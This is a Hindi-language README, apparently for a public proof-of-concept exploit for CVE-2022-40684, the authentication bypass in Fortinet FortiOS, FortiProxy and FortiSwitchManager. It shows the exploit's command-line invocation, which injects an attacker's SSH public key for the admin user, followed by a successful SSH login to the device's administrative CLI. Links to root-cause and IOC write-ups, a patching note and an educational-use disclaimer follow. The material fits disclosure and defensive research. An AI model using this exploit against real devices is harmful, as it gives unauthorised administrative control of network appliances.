
CVE-2022-40684 में Fortinet FortiOS, FortiProxy, और FortiSwitchManager में प्रमाणीकरण बायपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो निर्दिष्ट उपयोगकर्ताओं के लिए SSH कुंजी इंजेक्शन सक्षम करता है।
Fortinet FortiOS, FortiProxy, और FortiSwitchManager उपकरणों को प्रभावित करने वाले CVE-2022-40684 के लिए POC।
भेद्यता का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
समझौता संकेतकों के लिए Fortinet लॉग का विश्लेषण करने और गहरे लॉग कैसे सक्षम करें, इसके लिए हमारे IOC ब्लॉग देखें: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
यह POC निर्दिष्ट उपयोगकर्ता के लिए SSH कुंजी सेट करने के लिए प्रमाणीकरण बायपास भेद्यता का दुरुपयोग करता है।
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
नवीनतम संस्करण में अपडेट करें या Fortinet PSIRT के निर्देशों का पालन करके शमन करें
यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए नहीं किया जाना चाहिए, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।